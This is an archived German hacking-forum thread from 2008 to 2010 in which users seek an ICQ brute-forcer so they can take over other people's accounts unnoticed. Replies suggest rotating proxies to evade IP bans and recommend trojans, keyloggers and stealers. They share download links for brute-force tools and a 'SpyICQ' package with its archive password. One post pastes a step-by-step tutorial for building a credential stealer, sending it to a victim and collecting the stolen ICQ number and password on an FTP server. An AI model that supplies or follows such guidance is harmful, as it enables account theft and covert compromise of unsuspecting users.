PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : suche ICQ Bruter



kt16
15.07.2008, 08:53
Kann mir jemand einen ICQ Bruter mit Wordlist Funktion hochladen? Finde leider keinen mehr, der online ist!

Rockets20
16.07.2008, 12:54
jo ich bräuchte auch einen....

anarIX
16.07.2008, 13:00
http://free-hack.com/viewforum.php?f=59 da habt ihr wordlist...

aber kommt vergesst es, geht viel zu lange^^

Hu5eL
16.07.2008, 13:03
ihnen geht es in erster linie um den icq-bruter... und da kenne ich leider auch keinen :-(

Rockets20
16.07.2008, 14:51
ja und wie soll man es sont machen ohend ass der ander chekct dass ich ihn gehackt hab?

Hu5eL
16.07.2008, 15:00
mhh ka fud trojaner oder passwordstealer... aber ich habe leider sonst auch keine antwort..

inyourface
16.07.2008, 15:51
Zurzeit gibts echt kaum noch welche im Inet. Hab zurzeit auch keinen mehr drauf, wegen Plattencrash.
Werde mich ma ransetzen und einen suchen. Zur Not muss ich halt einen coden :x

mfg

<CrusadeR>
16.07.2008, 15:54
nach dem Update das icq vor längerem am protokoll eingeführt hat , ist es eigentlich nicht merh möglich zu bruten , da die uin nach einer bestimmten anzahl an versuchen gespert wird (einge bestimmte zeit lang), und die eigene ip gebannt wird (bzw eine bestimmte zeit lang geblock wird ^^)

soweit ich mich errinern kann^^

MfG

inyourface
16.07.2008, 16:25
Gibt trotzdem noch Mittel und Wege.

kt16
17.07.2008, 10:26
hey tommyyy, würd ich sau stark von dir finden, wenn du einen codest. ich selbst hab davon leider keine ahnung, sonst würd ich es ja selbst machen. aber im netz finde ich auch nichts ordentliches, nur würmer und trojaner ... und dieses pw zuschicken find ich doof, weil man den user ja was schicken muss und dieser nachher sich denken wer sein icq acc geklaut hat ... deswegen halt bruten.

Und zu dem update, ich könnte ja ne proxy nehmen und dann habe ich das problem mit dem ip ban auch hinter mir. und wenn die uid gesperrt wird, ist halt pech für den user, aber dann nehme ich halt ne andere xDD

Voda
24.07.2008, 18:17
hey tommyyy, würd ich sau stark von dir finden, wenn du einen codest. ich selbst hab davon leider keine ahnung, sonst würd ich es ja selbst machen. aber im netz finde ich auch nichts ordentliches, nur würmer und trojaner ... und dieses pw zuschicken find ich doof, weil man den user ja was schicken muss und dieser nachher sich denken wer sein icq acc geklaut hat ... deswegen halt bruten.

Und zu dem update, ich könnte ja ne proxy nehmen und dann habe ich das problem mit dem ip ban auch hinter mir. und wenn die uid gesperrt wird, ist halt pech für den user, aber dann nehme ich halt ne andere xDD

bin da zwar nicht so fit aber denke das da auch kein proxy hilft weil das dauert dan noch läääääääääänger wen immer die IP gewechselt werden muss.

inyourface
24.07.2008, 19:23
hey tommyyy, würd ich sau stark von dir finden, wenn du einen codest. ich selbst hab davon leider keine ahnung, sonst würd ich es ja selbst machen. aber im netz finde ich auch nichts ordentliches, nur würmer und trojaner ... und dieses pw zuschicken find ich doof, weil man den user ja was schicken muss und dieser nachher sich denken wer sein icq acc geklaut hat ... deswegen halt bruten.

Und zu dem update, ich könnte ja ne proxy nehmen und dann habe ich das problem mit dem ip ban auch hinter mir. und wenn die uid gesperrt wird, ist halt pech für den user, aber dann nehme ich halt ne andere xDD

bin da zwar nicht so fit aber denke das da auch kein proxy hilft weil das dauert dan noch läääääääääänger wen immer die IP gewechselt werden muss.

+1 Hab mir das grad mal angeschaut, das wäre eindeutig zuviel Arbeit ein Proxy Server zu integrieren und dann noch darauf zugreifen. Sry.

mfg

kt16
02.08.2008, 13:38
um nochmal aufs thema zurück zu kommen, gibts jemanden, der noch so einen icq bruter hat, wie ich ihn wünsche? oder gibts jemanden, der so einen programmieren kann, ob nun ohne oder mit proxy??

Wäre sau stark!

mfg

morrowind
06.08.2008, 07:40
Ich empfehle dir IPDbrute2/udc 2 Pro Se,hat Passwortlist funktion etc. Du brauchst aber noch nen Generator.
Da findest du alles http://free-hack.com/viewtopic.php?t=18714&highlight=ipdbrute .
mfg morrowind

Jaro
06.08.2008, 08:13
... ob nun ohne oder mit proxy??

Die Frage wurde schon beantwortet, ohne Proxy kannst du nicht mehr bruten, da Icq deine Ip nach X Versuchen sperrt!
Also brauchst du einen Bruter, der automatisch nach jedem Wort aus deiner Wordlist einen neuen Proxy sucht, zu dem verbindet und weiter brutet!
Jetzt rechne mal ungefähr hoch, wenn nur das Verbinden zum neuen Proxy 1 Sekunde dauert, wie viel Zeit bei einer durchschnittlichen Wordlist damit in Anspruch genommen wird!

Vergiss Bruteforce! Wenn es wichtig ist, dass du an das Passwort kommst, verwende einen Trojaner, Keylogger oder Stealer! Damit hast du sicher wesentlich mehr Chancen als mit Bruteforce!

sixthsense
09.08.2008, 09:24
Hallo bin neu hier. Deswegen entschuldigt, wenn ich vielleicht ein paar dämliche Fragen stelle:

Also ich hab kapiert, dass ein ICQ Passwort zu bruten nicht mehr geht. Schade, denn das wäre für einen wie mich ohne programmierkenntnisse das einfachste gewesen.

Für einen Keylogger brauche ich Zugang zum PC des anderen, oder?

zum Passwort Stealer:
Da habe ich das hier gefunden:

Passwort-Stealer
Eine andere Variante wäre z. B. einen speziellen "Password - Stealer" zu verwenden für ICQ wäre das
z. B. "SpyIcQ":
===============
Rapidshare.com:
http://rapidshare.com/files/13924896/SpyICQ.rar
Passwort:
free-hack
===============
Tutorial:
Dann macht alles wie im tut:
Willkommen zu meinem TUT,ich bin p0xst3r.
Diesmal will ich euch zeigen wie ihr mit hilfe eines kleinen tools, einen
webFTP server das ICQ Passwort eures Opfer herrauszubekommen.
1.Zuerst muesst ihr euch ein ftp server (zum Beispiel "www.funpic.de")
erstellen.
2.Danach geht ihr mit einem FTP Programm wie "smartFTP" auf denn Server
und packt die Datei "spy.php" dort rauf.
3.Started das Tool "SpyICQ" und geb denn direkten Pfard zu der "spy.php"
Datei auf eurem FTP Server an.
4.Wenn ihr jetzt auf "Create" geklickt habt wird eine weitere Datei
die ihr an euer Opfer verschicken muesst.
5.Wenn er die Datei ausgeführt hat koennt ihr auf euren Server gehen
und in einer weiteren erstellten txt Datei seine ICQ Nummer und Passwort
sehen.
PS: ich hoffe ich konnte euch weiterhelfen und euch die Sache so leicht wie möglich vermitteln.

----> meine Frage: Wie schaff ich es der PErson das Programm zu schicken ohne dass sie es merkt? Ich kann ja schlecht sagen "ich schick dir mal ein programm. Bitte für es aus"

kt16
10.08.2008, 11:21
genau das is ja das problem. deswegen will ich solche stealer ja nicht benutzen, da die person ja dann irgendwas ahnen kann! ob die uid der person für x-minuten gesperrt wird nach x-versuchen kann mir ja egal sein, dann mach ich halt später weiter. ich meine bruten geht ja immer noch, aber dauert halt ne weile, macht doch nichts ;-) aber ich habe mal so ein bruter gehabt, nur finde ich den nicht mehr.

Tix
10.08.2008, 12:17
IPD Brute 2
.brutal



google mal danach..

Kukumalo
10.08.2008, 12:18
ICQ Password Recovery ging mal..aber funktioniert jetzt auch nimmer :(
wars beste und einfchste um schnell paar UINs uf en PW zu bruten ^^

lg

Tix
10.08.2008, 12:19
Wieso soll es nichtmehr gehen oO


Kann man dort nicht auch Ranges auf ein pw scannen ?

Kukumalo
10.08.2008, 12:36
doch tix..aber letztes mal (kA wann das war) wo ich auf ranges cannen wollte ging das nicht mehr da dies von den ICQ servern blockiert wird...

kA ob die von dem tool ne neue version rausgebracht haben...welche version hast du denn?

sixthsense
11.08.2008, 10:02
genau das is ja das problem. deswegen will ich solche stealer ja nicht benutzen, da die person ja dann irgendwas ahnen kann! ob die uid der person für x-minuten gesperrt wird nach x-versuchen kann mir ja egal sein, dann mach ich halt später weiter. ich meine bruten geht ja immer noch, aber dauert halt ne weile, macht doch nichts ;-) aber ich habe mal so ein bruter gehabt, nur finde ich den nicht mehr.

Hat jemand mal einen Stealer verwendet? Mich würde es mal interessieren, wie er die Person dazu gebracht hat eine .exe datei auszuführen, ohne dass sie was merkt



IPD Brute 2
.brutal
google mal danach..

hab ich gemacht, aber keinen download gefunden. kann mir jemand helfen?

Mocu
28.08.2008, 22:09
Falls du es ncoht nicht gefunden hast ... Hier ist es bei http://rapidshare.com/files/6722208/ICQ.Toolz.FrEe-hAcK.com.rar

Buckethead
23.09.2008, 15:44
was redet ihr überhaupt noch von bruten.... das kannst sowas von knicken... ausserdas password lautet 12 oder so oder 123 aber sonst kannst das voll stecken ausserdem, wenn der typ nurn bisschen ahnung hat dann geht der auf murb.com und holt sich da die pw recovery, und den icqMD5 cracker und dann hat der sein pw innerhalb von 15 min. geändert ( also wenn er fest eingeloggt war auf seinem pc )

Added after 1 minutes:

und deine "arbeit" war umsonst^^

SteveOH
30.06.2010, 11:51
hab mir diesen IPD BRute2 runter geladen kann mir jemand sagen wieso beim öffnen dort steht dass die datei aufgrund des formats oder einem fehler nich geäffnet werden kann?:P

Bullterrier
30.06.2010, 11:57
vieleicht fake message?
Mal auf viren gechecked?

hl2.exe
30.06.2010, 12:03
Respekt! Einen Thread von 2008 ausgegraben ;-)

SteveOH
30.06.2010, 12:14
schon gemacht nichts gefunden...